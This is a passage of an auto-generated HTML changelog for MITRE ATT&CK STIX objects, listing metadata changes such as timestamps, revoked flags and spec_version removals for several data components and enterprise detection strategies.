style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 18:21:23.994000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0002] User Account Authentication</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:47:33.610000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.777000+00:00</td></tr></tbody></table></details><hr><h4>[DC0063] Windows Registry Key Modification</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 23:12:09.029000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0063</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0063</td></tr></tbody></table></details></details><h2>Detection Strategies</h2><h3>enterprise-attack</h3><details><summary>Patches</summary><hr><h4>[DET0210] Abuse of Domain Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0413] Abuse of Information Repositories for Data Collection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0455] Abuse of PowerShell for Arbitrary Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0120] Account Access Removal via Multi-Platform Audit Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0096] Account Manipulation Behavior Chain Detection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0415] Application Exhaustion Flood Detection Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0397] Automated Exfiltration Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0186] Automated File and API Collection Detection Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0088] Backup Software Discovery via CLI, Registry, and Process Inspection (T1518.002)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0280] Behavior-Based Registry Modification Detection on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0496] Behavior-Chain Detection for Remote Access Tools (Tool-Agnostic)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0124] Behavior-chain detection for T1132.001 Data Encoding: Standard Encoding (Base64/Hex/MIME) across Windows, Linux, macOS, ESXi</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0326] Behavior-chain detection for T1132.002 Data Encoding: Non-Standard Encoding across Windows, Linux, macOS, ESXi</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0354] Behavior-chain detection for T1133 External Remote Services across Windows, Linux, macOS, Containers</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0283] Behavior-chain detection for T1134 Access Token Manipulation on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 